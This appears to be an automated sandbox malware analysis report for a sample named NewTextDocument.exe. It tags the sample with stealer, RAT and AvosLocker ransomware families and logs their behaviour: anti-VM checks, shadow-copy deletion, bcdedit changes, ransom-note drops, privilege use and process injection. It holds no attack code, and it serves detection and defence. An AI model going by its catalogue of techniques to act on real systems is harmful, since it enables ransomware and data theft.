Malware Analysis Report

2024-10-16 03:27

Sample ID 240909-ktwyhazfjr
Target NewTextDocument.exe
SHA256 98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
Tags
agenttesla amadey avoslocker lumma redline sectoprat stealc vidar c7817d deepweb default logsdiller cloud (tg: @logsdillabot) rave defense_evasion discovery evasion execution impact infostealer keylogger persistence ransomware rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc

Threat Level: Known bad

The file NewTextDocument.exe was found to be: Known bad.

Malicious Activity Summary

agenttesla amadey avoslocker lumma redline sectoprat stealc vidar c7817d deepweb default logsdiller cloud (tg: @logsdillabot) rave defense_evasion discovery evasion execution impact infostealer keylogger persistence ransomware rat spyware stealer trojan

Avoslocker Ransomware

Lumma Stealer, LummaC

Amadey

RedLine

SectopRAT payload

RedLine payload

Vidar

Detect Vidar Stealer

SectopRAT

AgentTesla

Stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies boot configuration data using bcdedit

Deletes shadow copies

Renames multiple (7760) files with added filename extension

Downloads MZ/PE file

Creates new service(s)

Stops running service(s)

Executes dropped EXE

Checks computer location settings

Checks BIOS information in registry

Identifies Wine through registry keys

Drops desktop.ini file(s)

Power Settings

Enumerates connected drives

Checks installed software on the system

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Drops file in Program Files directory

Launches sc.exe

Embeds OpenSSL

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Delays execution with timeout.exe

Checks processor information in registry

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-09 08:54

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-09 08:54

Reported

2024-09-09 08:56

Platform

win10v2004-20240802-en

Max time kernel

18s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Amadey

trojan amadey

Avoslocker Ransomware

ransomware avoslocker

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer, LummaC

stealer lumma

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

Deletes shadow copies

ransomware defense_evasion impact execution

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\fugu.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (7760) files with added filename extension

ransomware

Creates new service(s)

persistence execution

Downloads MZ/PE file

Stops running service(s)

evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\fugu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\fugu.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\fugu.exe N/A

Checks installed software on the system

discovery

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\fugu.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\pt-BR.pak.DATA C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\adcvbs.inc C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\fonts\symbol.ttf C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\sunmscapi.jar C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning.png C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\acrobat_pdf.svg C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarWideTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\delete.svg C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_shared_single_filetype.svg C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Windows Media Player\uk-UA\wmpnssui.dll.mui C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Windows Media Player\uk-UA\wmpnssci.dll.mui C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f7\FA000000007 C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-16.png C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\msth8ES.LEX C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File created C:\Program Files\Reference Assemblies\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\defaultagent.ini C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUEPRNT\BLUEPRNT.ELM C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-180.png C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\main.css C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\DenyExpand.php C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\GR8GALRY.GRA C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\1033\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-180.png C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\main.css C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon.png C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Retail-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\de-DE\wmplayer.exe.mui C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\bn-IN.pak C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\vi.pak C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\ui-strings.js C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_hover.png C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\custom_poster.png C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\WinFXList.xml C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\bun.png C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\ui-strings.js C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL012.XML C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\ado\msado60.tlb C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hu-hu\ui-strings.js C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-ae\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\index.win32.bundle.map C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\ui-strings.js C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\modules\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PG_INDEX.XML C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL112.XML C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\office.core.operational.js C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File created C:\Program Files (x86)\Google\Update\Offline\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluNoInternetConnection_120x80.svg C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-64_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\LinkedInboxSmallTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_Grace-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Embeds OpenSSL

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\v.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\l.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\fugu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\s.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\fugu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\fugu.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2652 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Users\Admin\AppData\Local\Temp\a\pclient.exe
PID 2652 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Users\Admin\AppData\Local\Temp\a\pclient.exe
PID 2652 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Users\Admin\AppData\Local\Temp\a\s.exe
PID 2652 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Users\Admin\AppData\Local\Temp\a\s.exe
PID 2652 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Users\Admin\AppData\Local\Temp\a\s.exe
PID 2652 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Users\Admin\AppData\Local\Temp\a\v.exe
PID 2652 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Users\Admin\AppData\Local\Temp\a\v.exe
PID 2652 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Users\Admin\AppData\Local\Temp\a\v.exe
PID 2652 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Users\Admin\AppData\Local\Temp\a\l.exe
PID 2652 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Users\Admin\AppData\Local\Temp\a\l.exe
PID 2652 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe C:\Users\Admin\AppData\Local\Temp\a\l.exe
PID 3748 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\a\s.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\a\s.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\a\s.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\a\s.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\a\s.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\a\s.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\a\v.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\a\v.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\a\v.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\a\s.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\a\s.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\a\s.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\a\s.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\a\s.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
